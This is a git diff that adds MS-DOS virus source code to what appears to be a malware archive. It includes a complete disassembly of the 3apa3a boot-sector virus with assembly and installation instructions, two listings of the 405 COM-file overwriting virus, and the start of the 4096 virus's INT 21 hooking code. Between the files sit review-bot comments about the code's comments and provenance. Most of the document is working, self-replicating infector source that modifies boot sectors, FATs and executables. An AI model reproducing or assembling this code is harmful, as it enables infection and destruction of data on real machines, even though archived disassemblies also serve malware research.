@@ -0,0 +1,520 @@ +; To assemble, simple run TASM and TLINK on this file and generate a binary. +; The first 512d bytes of the binary will contain the portion of the virus +; which resides in IO.SYS. The second 512d bytes will contain the boot +; section portion of the virus. + +; Installation is slightly more difficult. It requires you to simulate +; an infection with 3apa3a. Read the text above for information. Basically, +; you have to fill in the BPB in the boot sector, fill in the patch values, +; and then move the pieces onto the disk properly. + + .model tiny + .code + .radix 16 + org 0 +; 3apa3a virus +; Disassembly by Dark Angel of Phalcon/Skism for 40Hex Issue 14 +zero: +_3apa3a: push cs + call doffset +doffset: pop si + db 83,0EE,4 ; sub si,4 + push si ax bx cx dx ds es + + mov ah,4 ; get date + int 1Ah + + cmp dh,8 ; september? + jne no_activate + + lea bx,cs:[si+message-_3apa3a] + mov ax,0E42 ; begin with B + mov cx,endmessage - message +display_loop: int 10 ; print character + add al,cs:[bx] ; calculate next character + inc bx + loop display_loop + +no_activate: cld + xor ax,ax ; ds = 0 + mov ds,ax + push cs ; es = cs + pop es + lea di,[si+offset old_i13] + push si + mov si,13*4 ; grab old int 13 handler + movsw + movsw + mov ax,ds:413 ; get BIOS memory size + dec ax ; decrease by 2K + dec ax + mov ds:413,ax ; replace the value + mov cl,6 ; convert to paragraphs + shl ax,cl + mov [si-2],ax ; replace interrupt handler + mov word ptr [si-4],offset i13 + mov es,ax ; move ourselves up + push cs + pop ds si + xor di,di + mov cx,200 + push si + rep movsw ; copy now! 
+ inc ch ; cx = 1 + sub si,200 ; copy rest + rep movsw + pop si + push cs es + mov ax,offset highentry + push ax + retf + +highentry: mov ax,7C0 + mov ds,ax + mov word ptr ds:200,201 + mov byte ptr ds:202,80 + les ax,dword ptr cs:203 + mov dx,es + pop es + mov bx,si + mov cx,1 + mov word ptr cs:3C2,0FCF0 ; patch work_on_sectors to call + call work_on_sectors ; do_i13 + pop es ds dx cx bx ax + retf + +message: db ' ' - 'B' + db 'B' - ' ' + db 'O' - 'B' + db 'O' - 'O' + db 'T' - 'O' + db ' ' - 'T' + db 'C' - ' ' + db 'E' - 'C' + db 'K' - 'E' + db 'T' - 'K' + db 'O' - 'T' + db 'P' - 'O' + db 'E' - 'P' + db ' ' - 'E' + db '-' - ' ' + db ' ' - '-' + db '3' - ' ' + db 'A' - '3' + db 'P' - 'A' + db 'A' - 'P' + db '3' - 'A' + db 'A' - '3' + db '!' - 'A' + db 7 - '!' + db 0Dh - 7 + db 10 - 0Dh +endmessage: + +do_i13: mov ax,ds:200 + mov dl,ds:202 + mov byte ptr cs:patch,0EBh ; jmp absolute + int 13 ; do interrupt + mov byte ptr cs:patch,75 ; jnz + jc retry_error + cld + retn + +retry_error: cmp dl,80 ; first hard drive? + je do_i13 ; if so, retry +go_exit_i13: jmp exit_i13 ; otherwise quit + +i13: push ax bx cx dx si di ds es bp + mov bp,sp + test dl,80 ; hard drive? 
+patch: jnz go_exit_i13 + + add dh,cl ; check if working on + add dh,ch ; boot sector or + cmp dh,1 ; partition table + ja go_exit_i13 ; if not, quit + + mov ax,cs ; get our current segment + add ax,20 ; move up 200 bytes + mov ds,ax + mov es,ax + mov word ptr ds:200,201 ; set function to read + mov ds:202,dl ; set drive to hard drive + mov bx,400 ; set buffer + xor dx,dx ; read in the boot sector + push dx + mov cx,1 + call do_i13 ; read in boot sector + + cmp byte ptr ds:400+21,2E ; check if 3apa3a already there + je go_exit_i13 + cmp byte ptr ds:400+18,0 + je go_exit_i13 + + push cs + pop es + mov di,203 + mov si,403 + mov cx,1Bh ; copy disk tables + cld + rep movsb + + sub si,200 ; copy the rest + mov cx,1E2 + rep movsb + + inc byte ptr ds:201 ; set to write + mov ax,ds:16 ; get sectors per FAT + mul byte ptr ds:10 ; multiply by # FATs + mov bx,ds:11 ; get number of sectors + mov cl,4 ; occupied by the root + shr bx,cl ; directory + db 83,0FBh,5 ; cmp bx,5 ; at least five? + jbe go_exit_i13 ; if not, quit + + add ax,bx ; + add ax,ds:0E ; add # reserved sectors + dec ax ; drop two sectors to find + dec ax ; start of last sector + xor dx,dx ; of root directory + push ax dx + call abs_sec_to_BIOS + mov ds:patch1-200,cx ; move original boot + mov ds:patch2-200,dh ; sector to the end of the + xor bx,bx ; root directory + call do_i13 + pop dx ax + dec ax + call abs_sec_to_BIOS + + mov ds:34,cx ;patch3 ; write io portion to + mov ds:37,dh ;patch4 + add bh,6 ; bx = 600 + call do_i13 + + push ds + xor ax,ax + mov ds,ax + mov dx,ds:46C ; get timer ticks + pop ds + + mov bl,dl ; eight possible instructions + db 83,0E3,3 ; and bx,3 + push bx + shl bx,1 ; convert to word index + mov si,bx + mov cx,es:[bx+encrypt_table] + pop bx + push bx + mov bh,bl + shr bl,1 ; bl decides which ptr to use + lea ax,cs:[bx+2BBE] ; patch pointer + mov ds:[decrypt-bs_3apa3a],ax ; and start location + add ch,bl + mov ds:[encrypt_instr-bs_3apa3a],cx + add ax,0CF40 + mov 
ds:[patch_endptr-bs_3apa3a],ax + pop ax + push ax + mul dh + add al,90 ; encode xchg ax,?? + add bl,46 ; encode inc pointer + mov ah,bl + mov ds:[patch_incptr-bs_3apa3a],ax + mov dx,word ptr cs:[si+decrypt_table] + mov word ptr cs:decrypt_instr,dx + pop di + db 83,0C7 ;add di,XX ; start past decryptor + dw bs_3apa3a_decrypt - bs_3apa3a + org $ - 1 + mov si,di + push ds + pop es + mov cx,end_crypt - bs_3apa3a_decrypt; bytes to crypt + mov ah,al +encrypt_loop: lodsb +decrypt_instr: add al,ah + stosb + loop encrypt_loop + + pop dx + mov cx,1 ; write the replacement + xor bx,bx ; boot sector to the disk + call do_i13 +exit_i13: mov sp,bp + pop bp es ds di si dx cx bx ax + db 0EAh +old_i13 dw 0, 0 + +decrypt_table: not al + sub al,ah + add al,ah + xor al,ah + +encrypt_table dw 014F6 ; not + dw 0480 ; add + dw 2C80 ; sub + dw 3480 ; xor +; This marks the end of the IO.SYS only portion of 3apa3a + +; The boot sector portion of 3apa3a follows. + + adj_ofs = 7C00 + zero - bs_3apa3a + +bs_3apa3a: jmp short decrypt + nop + ; The following is an invalid boot sector. Replace it with + ; yours. 
+ db ' ' + + db 00, 00, 00, 00, 00, 00 + db 00, 00, 00, 00, 00, 00 + db 00, 00, 00, 00, 00, 00 + db 00 + +decrypt: db 0BF ; mov di, + dw adj_ofs + bs_3apa3a_decrypt +decrypt_loop: db 2e ; cs: +encrypt_instr label word + db 80,2Dh ; sub byte ptr [di],XX +patch_incptr label word + db 0 ; temporary value for cryptval + inc di + db 81 ; cmp +patch_endptr label word + db 0ff ; pointer + dw adj_ofs + end_crypt + jne decrypt_loop +bs_3apa3a_decrypt = $ - 1 + jmp short enter_bs_3apa3a + nop + +load_original: xor dx,dx ; set up the read + mov es,dx ; of the original boot sector + db 0B9 ; mov cx, XXXX +patch3 dw 3 + db 0B6 +patch4 db 1 + mov bx,ds ; es:bx = 0:7C00 + mov ax,201 + db 0ebh ; jump to code in stack + dw bs_3apa3a - 4 - ($ + 1) + + org $ - 1 + +enter_bs_3apa3a:cli + xor ax,ax + mov ss,ax ; set stack to just below us + mov sp,7C00 + sti + mov dl,80 ; reset hard drive + int 13 + + mov ax,2F72 ; encode JNZ load_original at + ; 7BFE + mov ds,sp ; set segment registers to + mov es,sp ; 7C00 + push ax + mov word ptr ds:200,201 ; do a read + mov ds:202,dl ; from the hard drive + xor bx,bx ; read to 7C00:0 + mov dh,1 ; read head 1 + mov cx,1 ; read sector 1 + ; (assumes active boot + ; sector is here) + mov ax,13CDh ; encode int 13 at 7BFC + push ax + call exec_int13 ; do the read + mov bx,203 + cmp byte ptr [bx-4],0AA ; is it valid bs? +jnz_load_original: + jne load_original ; if not, assume infected and + ; transfer control to it + mov ax,ds:13 ; get number of sectors in + dec ax ; image - 1 + cmp ax,5103 ; hard drive too small? 
(5103h + jbe load_original ; sectors ~ 10.6 megs) + mov ax,ds:1C ; get number hidden sectors + add ax,ds:0E ; add number reserved sectors + mov ds:9,ax ; store at location that holds + ; the end of OEM signature + add ax,ds:16 ; add sectors per FAT + dec ax ; go down two sectors + dec ax + push ax + xor dx,dx + mov cx,dx + call work_on_sectors ; load end of FAT to 7C00:203 + mov ax,ds:16 ; get sectors per FAT + push ax ; save the value + mul byte ptr ds:10 ; multiply by # FATs + add ax,ds:9 ; calculate start of root dir + mov ds:7,ax ; store it in work buffer + mov cl,4 + mov si,ds:11 ; get number sectors the + shr si,cl ; root directory takes + add si,ax ; and calculate start of data + mov ds:5,si ; area and store it in buffer + call work_on_sectors ; get first 5 sectors of the + ; root directory + test byte ptr ds:403+0Bh,8 ; volume label bit set on first + ; entry? (infection marker) +jne_load_original: ; if so, already infected, so + jnz jnz_load_original ; quit + xor si,si + mov bx,1003 + mov ax,ds:403+1A ; get starting cluster number + ; of IO.SYS +read_IO_SYS: push ax ; convert cluster to absolute + call clus_to_abs_sec ; sector number + call work_on_sector ; read in one cluster of IO.SYS + inc si + pop ax + + push bx ax + mov bx,403+0A00 ; read into this buffer + push bx + mov al,ah ; find the sector with the FAT + xor dx,dx ; entry corresponding to this + mov ah,dl ; cluster + add ax,ds:9 + call work_on_sectors ; read in the FAT + pop bx ax + mov ah,dl + shl ax,1 + mov di,ax + mov ax,[bx+di] ; grab the FAT entry (either EOF + ; or next cluster number) + pop bx ; corresponding to this cluster + cmp ax,0FFF0 ; is there any more to read? 
+ jb read_IO_SYS ; if so, keep going + + inc byte ptr ds:201 ; change function to a write + pop cx + dec cx + dec cx + mov ds:4,cl + mov di,401 ; scan the end of the FAT + mov cx,100 + mov bp,-1 +copy_IO_SYS: xor ax,ax ; look for unused clusters + repne scasw + jnz jne_load_original + mov [di+2],bp + mov bx,cx + mov bh,ds:4 + mov bp,bx ; save starting cluster of + push bp cx ; where IO.SYS will be moved + mov ah,ds:0Dh + shl ax,1 + dec si + mul si + mov bx,ax + add bx,1003 + mov ax,bp + call clus_to_abs_sec + call work_on_sector ; move IO.SYS to end of HD + pop cx bp + or si,si + jnz copy_IO_SYS + + mov si,0DE1 ; move all but the first two + mov di,0E01 ; directory entries down one + mov cx,4D0 ; (10 dir entries / sector, + rep movsw ; 5 sectors) + ; DF set by exec_int13 + mov si,421 ; move IO.SYS entry down two + mov cx,10 ; entries + rep movsw + + mov ds:400+2*20+1Dh,bp ; set starting cluster of the + ; moved original IO.SYS + or byte ptr ds:40E,8 ; set volume label bit on first + ; IO.SYS entry + mov bx,403 ; point to root directory + mov ax,ds:7 ; get starting cluster of + xor dx,dx ; root dir + mov cl,4 + call work_on_sectors ; write updated root directory + pop ax ; to the disk +write_FATs: mov bx,203 ; point to the updated FAT + call work_on_sectors ; write changed end of FAT + + dec ax + add ax,ds:16 ; add sectors per FAT + dec byte ptr ds:10 ; processed all the FATs? 
+ jnz write_FATs + + mov ax,bp + call clus_to_abs_sec + mov cs:7C03,ax ; store the values + mov cs:7C05,dx + mov byte ptr cs:7C01,1Ch + + xor ax,ax ; reset default drive + mov dx,ax + int 13 + + mov ax,201 ; read in original boot sector +; You must patch the following values if you are installing 3apa3a on a disk + db 0b9 ; mov cx, XXXX +patch1 dw 0 + db 0b6 ; mov dh, XX +patch2 db 0 + mov bx,0E03 + call perform_int13 + + mov ax,ds:403+1A ; get starting cluster number + call clus_to_abs_sec ; of IO.SYS + xor cx,cx + call work_on_sectors + mov bx,ds + mov es,cx + call work_on_sectors +go_load_original: + jmp load_original + +exec_int13: mov ax,ds:200 ; get function from memory + mov dl,ds:202 ; get drive from memory +perform_int13: int 13 + jc go_load_original + std + retn + +work_on_sectors:inc cx +work_on_sector: push cx dx ax + call abs_sec_to_BIOS + call exec_int13 + pop ax dx cx + add ax,1 ; calculate next sector + db 83,0D2,0 ; adc dx,0 ; (don't use INC because + add bh,2 ; INC doesn't set carry) + loop work_on_sector ; do it for the next sector + + retn + +abs_sec_to_BIOS:div word ptr ds:18 ; divide by sectors per track + mov cx,dx + inc cl + xor dx,dx + div word ptr ds:1A ; divide by number of heads + ror ah,1 + ror ah,1 + xchg ah,al + add cx,ax + mov dh,dl + retn + +clus_to_abs_sec:mov cl,ds:0Dh ; get sectors per cluster + xor ch,ch ; (convert to word) + dec ax + dec ax + mul cx ; convert cluster number to + add ax,ds:5 ; absolute sector number +end_crypt: db 83,0D2,0 ; adc dx,0 + retn + + dw 0AA55 ; boot signature + + end _3apa3a + diff --git a/MSDOS/Virus.MSDOS.Unknown.405.asm b/MSDOS/Virus.MSDOS.Unknown.405.asm new file mode 100644 index 00000000..34c7347d --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.405.asm 
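Review bot: `cmp dh,8 ; september?` misreads the INT 1Ah/AH=04h result it follows: DH holds the month in BCD, so 8 is August, and since this compare is the payload trigger the month matters for detection rules and incident timelines — `; august?` is the correction. In do_i13, `; jmp absolute` beside `0EBh` is also off: EBh is the short relative JMP opcode, written over the `jnz` at `patch` so that the handler, when re-entered by do_i13's own `int 13`, takes the exit path unconditionally; `; jmp short (exit unconditionally while we call the original)` describes it.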
@@ -0,0 +1,177 @@ +;405 virus +;disassembled 10th March 1991 by Fred Deakin. +; + +start: + xchg si,ax ;96 }marker bytes ? + add [bx+si],al ;00 00 } + sahf ;9e } + add [bx+si],al ;00 00 } + nop ;90 } + mov ax,0000h ;clear ax + mov byte es:[drive],al ;default drive? + mov byte es:[dir_path],al ;clear first byte in directory path + mov byte es:[l_drvs],al ;clear logical drives + push ax ;save ax + mov ah,19h ;get current drive + int 21h ;call msdos + mov byte es:[drive],al ;and save + mov ah,47h ;get directory path + add al,01h ;add 1 to drive code + push ax ;and save + mov dl,al ;move drive code to dl + lea si,[dir_path] ;si=offset address of directory buffer + int 21h ;call msdos + pop ax ;get back drive code + mov ah,0eh ;set default drive + sub al,01h ;subtract and get logical drive + mov dl,al ;drive wanted + int 21h ;call msdos + mov byte es:[l_drvs],al ;store how many logical drives +l0139: + mov al,byte es:[drive] ;get default drive + cmp al,00h ;drive a:? + jnz l0152 ;if not jump forward + mov ah,0eh ;set default drive + mov dl,02h ;drive c: + int 21h ;call msdos + mov ah,19h ;get current drive + int 21h ;call msdos + mov byte es:[c_drv],al ;and save + jmp l0179 ;jump forward + nop ;no operation +l0152: + cmp al,01h ;drive b:? + jnz l0167 ;jump forward if not + mov ah,0eh ;set default drive + mov dl,02h ;to drive c: + int 21h ;call msdos + mov ah,19h ;get current drive + int 21h ;call msdos + mov byte es:[c_drv],al ;and save + jmp l0179 ;jump forward + nop ;no operation +l0167: + cmp al,02h ;drive c:? 
+ jnz l0179 ;if not jump forward + mov ah,0eh ;set default drive + mov dl,00h ;drive a: + int 21h ;call msdos + mov ah,19h ;get current drive + int 21h ;call msdos + mov byte es:[c_drv],al ;and save +l0179: + mov ah,4eh ;search for first + mov cx,0001h ;file attributes + lea dx,[f_name] ;point to file name + int 21h ;call msdos + jb l0189 ;no .COM files + jmp l01a9 ;found one + nop ;no operation +l0189: + mov ah,3bh ;set directory + lea dx,[l0297] ;point to path + int 21h ;call msdos + mov ah,4eh ;search for first + mov cx,0011h ;set attributes + lea dx,[l0292] ; + int 21h ;call msdos + jb l0139 ;no .COM files + jmp l0179 ;jump back +l01a0: + mov ah,4fh ;search for next + int 21h ;call msdos + jb l0189 ;no .COM files found + jmp l01a9 ;found one + nop ;no operation +l01a9: + mov ah,3dh ;open file + mov al,02h ;for read/write access + mov dx,009eh ;offset address of path name + int 21h ;call msdos + mov bx,ax ;save file handle + mov ah,3fh ;read file + mov cx,0195h ;would you believe 405 bytes to read + nop ;no operation + mov dx,0e000h ;offset address of buffer + nop ;no operation + int 21h ;call msdos + mov ah,3eh ;close file + int 21h ;call msdos + mov bx,es:[0e000h] ;get first byte of loaded buffer + cmp bx,9600h ;405 virus already installed? + jz l01a0 ;yes jump back and search for next + mov ah,43h ;get/set file attributes + mov al,00h ;get file attributes + mov dx,009eh ;offset address of path name + int 21h ;call msdos + mov ah,43h ;get/set file attributes + mov al,01h ;set file attributes + and cx,00feh ;no files read only + int 21h ;call msdos + mov ah,3dh ;open file + mov al,02h ;for read/write access + mov dx,009eh ;offset address of path name + int 21h ;call msdos + mov bx,ax ;save file handle in bx + mov ah,57h ;get/set date and time + mov al,00h ;get file date and time + int 21h ;call msdos + push cx ;file time + push dx ;file date + mov dx,cs:[0295h] ;get variable byte? 
+ mov cs:[0e195h],dx ;place at end of file loaded + mov dx,cs:[0e001h] ;get second byte in buffer + lea cx,ds:[0194h] ; + sub dx,cx ; + mov cs:[0295h],dx ;place at end of file + mov ah,40h ;write file + mov cx,0195h ;amount of bytes to write + nop ;no operation + lea dx,[start] ;get starting location + int 21h ;call msdos + mov ah,57h ;get/set file date and time + mov al,01h ;set file date and time + pop dx ;file date + pop cx ;file time + int 21h ;call msdos + mov ah,3eh ;close file + int 21h ;call msdos + mov dx,cs:[0e195h] ;get variable + mov cs:[0295h],dx ;place at end of file + jmp l0234 ;jump forward + nop ;no operation +l0234: + mov ah,0eh ;set default drive + mov dl,byte cs:[drive] ;get back original default drive + int 21h ;call msdos + mov ah,3bh ;set directory + lea dx,[c_drv] ;8d 16 4a 02 + int 21h ;call msdos + mov ah,00h ;return to dos + int 21h ;call msdos +drive: + db 02 ;drive variable +c_drv: + db 00 ;current drive +dir_path: + db "TEST" + db 00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00 + db 00,00,00,00,00,00,00,00,00,00 +l_drvs: + db 00 ;how many logical drives on system +f_name: + db "*.COM" + db 0h +l0292: + db 2ah,00h +l0293: + db 0e9h,00h +l0295: + db 00h +l0297: + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.405_.asm b/MSDOS/Virus.MSDOS.Unknown.405_.asm new file mode 100644 index 00000000..21ddfbbb --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.405_.asm 
@@ -0,0 +1,206 @@
+ title The '405' virus
+ page 65,132
+; ͻ
+; British Computer Virus Research Centre
+; 12 Guildford Street, Brighton, East Sussex, BN1 3LS, England
+; Telephone: Domestic 0273-26105, International +44-273-26105
+;
+; The '405' Virus
+; Disassembled by Joe Hirst, March 1989
+;
+; Copyright (c) Joe Hirst 1989.
+;
+; This listing is only to be made available to virus researchers
+; or software writers on a need-to-know basis.
+; ͼ
+
+ ; The virus overwrites the first 405 bytes of a COM file. If the
+ ; length of the COM file is less than this, the length is increased
+ ; to 405 bytes.
+
+ ; The disassembly has been tested by re-assembly using MASM 5.0.
+
+BUFFER SEGMENT AT 0
+
+ ORG 295H
+DW0295 DW ?
+DB0297 DB ?
+
+ ORG 0E000H
+DWE000 DW ? ; Read buffer area
+
+ ORG 0E195H
+DWE195 DW ? ; Program after virus
+
+BUFFER ENDS
+
+CODE SEGMENT BYTE PUBLIC 'CODE'
+ ASSUME CS:CODE,DS:NOTHING,ES:BUFFER
+
+VIRLEN EQU OFFSET ENDADR-START
+ ORG 100H
+
+START: XCHG SI,AX
+ ADD [BX+SI],AL
+ SAHF
+ ADD [BX+SI],AL
+ NOP
+
+ MOV AX,0 ; Clear register
+ MOV ES:DB0249,AL ; Set current disk to default
+ MOV ES:DB024B,AL ; Set pathname store to zero
+ MOV ES:DB028B,AL ; Set number of drives to zero
+ PUSH AX
+ MOV AH,19H ; Get current disk function
+ INT 21H ; DOS service
+ MOV ES:DB0249,AL ; Save current disk
+ MOV AH,47H ; Get current directory function
+ ADD AL,1 ; Next drive (A)
+ PUSH AX
+ MOV DL,AL ; Drive A
+ LEA SI,DB024B ; Pathname store
+ INT 21H ; DOS service
+ POP AX
+ MOV AH,0EH ; Select disk function
+ SUB AL,1 ; Convert drive for select function
+ MOV DL,AL ; Move drive
+ INT 21H ; DOS service
+ MOV ES:DB028B,AL ; Save number of drives
+BP0139: MOV AL,ES:DB0249 ; Get current disk
+ CMP AL,0 ; Is drive A?
+ JNZ BP0152 ; Branch if not
+ MOV AH,0EH ; Select disk function
+ MOV DL,2 ; Change drive to B
+ INT 21H ; DOS service
+ MOV AH,19H ; Get current disk function
+ INT 21H ; DOS service
+ MOV ES:DB024A,AL ; Save new current drive
+ JMP BP0179
+
+BP0152: CMP AL,1 ; Is drive B?
+ JNZ BP0167 ; Branch if not
+ MOV AH,0EH ; Select disk function
+ MOV DL,2 ; Change drive to C
+ INT 21H ; DOS service
+ MOV AH,19H ; Get current disk function
+ INT 21H ; DOS service
+ MOV ES:DB024A,AL ; Save new current drive
+ JMP BP0179
+
+BP0167: CMP AL,2 ; Is drive C?
+ JNZ BP0179 ; Branch if not
+ MOV AH,0EH ; Select disk function
+ MOV DL,0 ; Change drive to A
+ INT 21H ; DOS service
+ MOV AH,19H ; Get current disk function
+ INT 21H ; DOS service
+ MOV ES:DB024A,AL ; Save new current drive
+BP0179: MOV AH,4EH ; Find first file function
+ MOV CX,1 ; Find read-only files, not system
+ LEA DX,DB028C ; Path '*.COM'
+ INT 21H ; DOS service
+ JB BP0189 ; Branch if error
+ JMP BP01A9 ; Process COM file
+
+BP0189: MOV AH,3BH ; Change current directory function
+ LEA DX,DB0297 ; Directory pathname (this is past the end)
+ INT 21H ; DOS service
+ MOV AH,4EH ; Find first file function
+ MOV CX,0011H ; Find directory and read-only
+ LEA DX,DB0292 ; Path '*'
+ INT 21H ; DOS service
+ JB BP0139 ; Branch if error
+ JMP BP0179 ; Find a COM file
+
+BP01A0: MOV AH,4FH ; Find next file function
+ INT 21H ; DOS service
+ JB BP0189 ; Branch if error
+ JMP BP01A9 ; Process COM file
+
+ ; Process COM file
+
+BP01A9: MOV AH,3DH ; Open handle function
+ MOV AL,2 ; R/W access
+ MOV DX,009EH ; File pathname
+ INT 21H ; DOS service
+ MOV BX,AX ; Move handle
+ MOV AH,3FH ; Read handle function
+ MOV CX,VIRLEN ; Length of virus
+ NOP
+ MOV DX,OFFSET DWE000 ; Read it in way down there
+ NOP
+ INT 21H ; DOS service
+ MOV AH,3EH ; Close handle function
+ INT 21H ; DOS service
+ MOV BX,DWE000 ; Get first word of COM file
+ CMP BX,9600H ; Is it infected? (should be 0096H)
+ JZ BP01A0 ; Yes, find another one
+ MOV AH,43H ; \ Get file attributes function
+ MOV AL,0 ; /
+ MOV DX,009EH ; File pathname
+ INT 21H ; DOS service
+ MOV AH,43H ; \ Set file attributes function
+ MOV AL,1 ; /
+ AND CX,00FEH ; Set off read only attribute
+ INT 21H ; DOS service
+ MOV AH,3DH ; Open handle function
+ MOV AL,2 ; R/W mode
+ MOV DX,009EH ; File pathname
+ INT 21H ; DOS service
+ MOV BX,AX ; Move handle
+ MOV AH,57H ; \ Get file date & time function
+ MOV AL,0 ; /
+ INT 21H ; DOS service
+ PUSH CX
+ PUSH DX
+ ASSUME ES:NOTHING
+ MOV DX,CS:DW0295 ; Get word after virus here
+ MOV CS:DWE195,DX ; Move to same position in prog
+ MOV DX,CS:DWE000+1 ; Get displacement from initial jump
+ LEA CX,DB0294-100H ; Length of virus minus one
+ SUB DX,CX
+ MOV CS:DW0295,DX ; Store in word after virus
+ MOV AH,40H ; Write handle function
+ MOV CX,VIRLEN ; Length of virus
+ NOP
+ LEA DX,START ; Beginning of virus
+ INT 21H ; DOS service
+ MOV AH,57H ; \ Set file date & time function
+ MOV AL,1 ; /
+ POP DX
+ POP CX
+ INT 21H ; DOS service
+ MOV AH,3EH ; Close handle function
+ INT 21H ; DOS service
+ MOV DX,CS:DWE195 ; Get word after virus
+ MOV CS:DW0295,DX ; Move to same position here
+ JMP BP0234
+
+BP0234: MOV AH,0EH ; Select disk function
+ MOV DL,CS:DB0249 ; Get current disk
+ INT 21H ; DOS service
+ MOV AH,3BH ; Change current directory function
+ LEA DX,DB024A ; Address of path - this is incorrect
+ INT 21H ; DOS service
+ MOV AH,0 ; Terminate program function
+ INT 21H ; DOS service
+
+DB0249 DB 2 ; Current disk
+DB024A DB 0 ; New current drive
+
+ ; There should be an extra byte at this point containing '\'
+ ; for use by the change directory function - this is why that
+ ; function is pointing at the previous field
+
+DB024B DB 'TEST', 3CH DUP (0)
+DB028B DB 0DH ; Number of drives
+DB028C DB '*.COM', 0
+DB0292 DB '*', 0
+DB0294 DB 0E9H
+
+ENDADR EQU $
+
+CODE ENDS
+
+ END START
+
\ No newline at end of file
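Review bot: This listing has no note saying how it relates to the listing added immediately before it in the patch, and the two appear to be independent disassemblies of the same 405 sample: both walk the same find-first loop at BP0179/l0179, read a 0195h-byte image to offset 0E000h, and test the first word of the file against 9600H before writing. The trailing-underscore filename does not convey that, so a researcher browsing the archive has to diff the two files to discover it. A one-line provenance comment under the existing header, e.g. `; Alternate disassembly (Hirst, March 1989) of the same sample as the preceding 405 listing in this archive`, would make the duplication explicit without altering the archival text.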
diff --git a/MSDOS/Virus.MSDOS.Unknown.4096.asm b/MSDOS/Virus.MSDOS.Unknown.4096.asm
new file mode 100644
index 00000000..da57d58f
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.4096.asm
@@ -0,0 +1,1902 @@ + +PAGE 59,132 + +; +; +; VIR_ +; +; Created: ??-??-?? +; Version: +; Code type: zero start +; Passes: 9 Analysis Options on: A +; +; Disassembled by: Sir John -- 11.MAR.1991 +; +; + +PSP_0A equ 0Ah ; (0000:000A=0) +MCB_0000 equ 0 ; (7DBC:0000=E9) +MCB_0001 equ 1 ; (7DBC:0001=275h) +MCB_0003 equ 3 ; (7DBC:0003=1503h) +all_len equ 1600h +jmp_len equ 3 +sav_file equ data_23 - virus_entry + jmp_len + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + org 0 + + db 00h + + jmp vir_1 +data_23 dw 20CDh ; old file +data_24 dw 0 ; (first 6 bytes) +data_25 dw 0 ; - check sum + db 0,0,0,0,0,0,0,0 +data_27 dw 0 ; + 0eh = original SS: +data_28 dw 0 ; + 10h = original SP + dw 0 +data_29 dd 0 ; + 14h = .EXE file entry point + db 0,0,0,0 +data_31 db 0 ; flag : 1-EXE, 0-COM +data_32 db 0FEh + db 3Ah +debug: push bp ;address is 0023 + mov bp,sp + push ax + cmp [bp+4],0C000h + jae loc_1_1 ; segment > C000 + mov ax,cs:data_68 + cmp [bp+4],ax + jna loc_1_1 +loc_1: pop ax + pop bp + iret ; Interrupt return +loc_1_1: cmp byte ptr cs:data_73,1 ; (CS:1250=0) + je loc_3 ; Jump if equal + mov ax,[bp+4] + mov word ptr cs:old_INT+2,ax ; (CS:122F=70h) + mov ax,[bp+2] + mov word ptr cs:old_INT,ax ; (CS:122D=0) + jc loc_2 ; Jump if carry Set + pop ax + pop bp + mov ss,cs:data_92 ; (CS:12DD=151Ch) + mov sp,cs:data_93 ; (CS:12DF=0) + mov al,cs:data_97 ; (CS:12E5=0) + out 21h,al ; port 21h, 8259-1 int comands + jmp loc_79 ; (0D40) +loc_2: + and word ptr [bp+6],0FEFFh + mov al,cs:data_97 ; (CS:12E5=0) + out 21h,al ; port 21h, 8259-1 int comands + jmp short loc_1 ; (0037) +loc_3: + dec cs:data_74 ; (CS:1251=0) + jnz loc_1 ; Jump if not zero + and word ptr [bp+6],0FEFFh + call sub_21 ; Save REGS in vir's stack + call sub_18 ; (0DBA) + lds dx,cs:old_INT_1 ; (CS:1231=0) Load 32 bit ptr + mov al,1 + call sub_27 ; Set INT 01 vector + call sub_20 ; Restore regs from vir's stack + jmp short loc_2 ; (0067) + + +; +; SUBROUTINE +; + +sub_1 proc near + push ds + push si + xor si,si ; 
Zero register + mov ds,si + xor ah,ah ; Zero register + mov si,ax + shl si,1 ; Shift w/zeros fill + shl si,1 ; Shift w/zeros fill + mov bx,[si] + mov es,[si+2] + pop si + pop ds + retn +sub_1 endp + +vir_1: mov cs:data_113,1600h ; (CS:135B=0) + mov cs:old_AX,ax ; (CS:12E3=0) + mov ah,30h + int 21h ; DOS Services ah=function 30h + ; get DOS version number ax + mov cs:dos_ver,al ; (CS:12EE=0) + mov cs:old_DS,ds ; (CS:1245=7DBDh) + mov ah,52h + int 21h ; DOS Services ah=function 52h + ; get DOS data table ptr es:bx + mov ax,es:[bx-2] + mov cs:data_68,ax ; (CS:1247=0) + mov es,ax + mov ax,es:[1] ; (5200:0001=0FFFFh) + mov cs:data_69,ax ; (CS:1249=0) + push cs + pop ds + mov al,1 + call sub_1 ; Get INT 01 vector + mov word ptr old_INT_1,bx ; (CS:1231=0) + mov word ptr old_INT_1+2,es ; (CS:1233=70h) + mov al,21h + call sub_1 ; Get INT 21 vector + mov word ptr old_INT,bx ; (CS:122D=0) + mov word ptr old_INT+2,es ; (CS:122F=70h) + mov byte ptr data_73,0 ; (CS:1250=0) + mov dx,offset debug + mov al,1 + call sub_27 ; Set INT 01 vector + pushf ; Push flags + pop ax + or ax,100h + push ax + in al,21h ; port 21h, 8259-1 int IMR + mov data_97,al ; (CS:12E5) + mov al,0FFh + out 21h,al ; port 21h, 8259-1 int comands + popf ; Pop flags + mov ah,52h + pushf ; Push flags + call dword ptr old_INT ; (CS:122D) + pushf ; Push flags + pop ax + and ax,0FEFFh + push ax + popf ; Pop flags + mov al,data_97 ; (CS:12E5=0) + out 21h,al ; port 21h, 8259-1 int comands + push ds + lds dx,old_INT_1 ; (CS:1231=0) Load 32 bit ptr + mov al,1 + call sub_27 ; Set INT 01 vector + pop ds + les di,old_INT ; (CS:122D=0) Load 32 bit ptr + mov word ptr ptr_INT_21,di ; (CS:1235=0) + mov word ptr ptr_INT_21+2,es ; (CS:1237=70h) + mov byte ptr data_70,0EAh ; (CS:124B=0) + mov data_71,offset INT_21 ; (CS:124C=0) (02CC) + mov data_72,cs ; (CS:124E=7DBDh) + call sub_18 ; (0DBA) + mov ax,4B00h + mov data_95,ah ; (CS:12E2=0) + mov dx,offset data_32 ; 